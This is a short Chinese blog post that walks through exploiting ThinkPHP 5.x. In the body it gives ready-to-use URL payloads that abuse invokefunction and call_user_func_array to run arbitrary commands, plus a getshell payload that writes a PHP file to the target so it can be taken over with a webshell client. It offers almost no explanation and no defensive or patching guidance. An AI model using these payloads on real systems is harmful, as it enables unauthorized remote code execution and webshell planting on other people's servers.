常见框架漏洞：Thinkphp(TP)篇

与神明画鸭2025-03-26 7:04

简介

ThinkPHP （简称 TP ）是一款流行的 国产开源 PHP 框架 ，遵循 MVC（Model-View-Controller） 设计模式，以简洁、高效、灵活著称，广泛应用于国内中小型 Web 项目开发。

Thinkphp5x远程命令执行及getshell

原理

rce

过程

打开网站

复制代码

?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[
1][]=-1

在后面拼接指令即可

getshell

复制代码

?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1]
[]=echo "<?php phpinfo();?>" >>1.php

访问后使用蚁剑链接即可

上一篇：OpenCV图像拼接（6）图像拼接模块的用于创建权重图函数createWeightMap()

下一篇：Ubuntu 更换阿里云镜像源图文详细教程

热门推荐

01GitHub 镜像站点 02Claude Code + GLM4.7 避坑指南：解决 Unable to connect to Anthropic services 03使用 1panel面板部署 php网站 04OpenClaw Chrome扩展使用教程 - 浏览器中继控制 05Linux下V2Ray安装配置指南 06Vue-skills的中文文档 07UV安装并设置国内源 08让 Trae IDE 智能体 “读懂”文档 Excel+PDF+DOCX ：mcp-documents-reader 工具使用指南 09Claude Code Skills 实用使用手册 10一文了解国产算子编程语言 TileLang，TileLang 对国产开源生态的影响与启示